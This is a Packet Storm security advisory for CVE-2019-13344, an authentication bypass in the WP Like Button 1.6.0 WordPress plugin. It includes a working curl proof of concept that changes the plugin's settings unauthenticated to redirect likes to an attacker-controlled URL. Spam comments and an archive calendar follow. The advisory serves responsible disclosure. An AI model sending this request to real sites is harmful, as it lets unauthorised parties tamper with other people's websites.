what you don't know can hurt you

WordPress Like Button 1.6.0 Authentication Bypass

WordPress Like Button 1.6.0 Authentication Bypass
Posted Jul 8, 2019
Authored by Benjamin Lim

WordPress Like Button plugin version 1.6.0 suffers from an authentication bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2019-13344
MD5 | bc861cae71e13184e2bf0e9ae42db5ea

WordPress Like Button 1.6.0 Authentication Bypass

Change Mirror Download
Exploit Title: WP Like Button 1.6.0 - Auth Bypass
Date: 05-Jul-19
Exploit Author: Benjamin Lim
Vendor Homepage: http://www.crudlab.com
Software Link: https://wordpress.org/plugins/wp-like-button/
Version: 1.6.0
CVE : CVE-2019-13344

1. Product & Service Introduction:
WP Like button allows you to add Facebook like button on your wordpress
blog. You can also add Share button along with Like button or can add
recommend button. As of now, the plugin has been downloaded 129,089 times
and has 10,000+ active installs.

2. Technical Details & Description:
Authentication Bypass vulnerability in the WP Like Button (Free) plugin
version 1.6.0 allows unauthenticated attackers to change the settings of
the plugin. The contains() function in wp_like_button.php did not check if
the current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the settings of the plugin.

3. Proof of Concept (PoC):
For example, the curl command below allows an attacker to change the
each_page_url parameter to https://hijack.com. This allows the attacker to
hijack Facebook likes.

curl -k -i --raw -X POST -d
"page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=
https://hijack.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb="
"https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
-H "Content-Type: application/x-www-form-urlencoded"

4. Mitigation
No update has been released by the vendor. Users are advised to switch to a
different plugin.

5. Disclosure Timeline
2019/06/24 Vendor contacted regarding vulnerability in v1.5.0 (crudlab@gmail.com)
2019/06/30 Second email sent to vendor (crudlab@gmail.com)
2019/07/02 Vendor released v1.6.0 update. Vulnerability still exists.
Vendor did not acknowledge any emails.
2018/07/03 Third email sent to vendor's billing email domain (info@purelogics.net)
2018/07/05 Public disclosure

6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]

Comments (3)

RSS Feed Subscribe to this comment feed
ericaturner

You have posted a fantastic blog! This is the best blog, most concise step by step guide.www.canonprintersupport247.com/blog/fix-canon-prin…

Comment by ericaturner
2019-07-09 06:53:54 UTC | Permalink | Reply
amysmith22

Your Blog is quite decent, Thank's for sharing this valuable information.

Do you need help for Canon Printer Error Code b200? Are you facing an issue of Canon Printer Error Code b200?

Comment by amysmith22
2019-07-31 07:27:31 UTC | Permalink | Reply
amysmith22

It is an amazing Article.
Troubleshoot Canon Printer Error 5100 with easy tricks. Read and perform steps to troubleshoot Canon Printer Error 5100.

Comment by amysmith22
2019-08-06 07:47:54 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    17 Files
  • 20
    Nov 20th
    15 Files
  • 21
    Nov 21st
    16 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close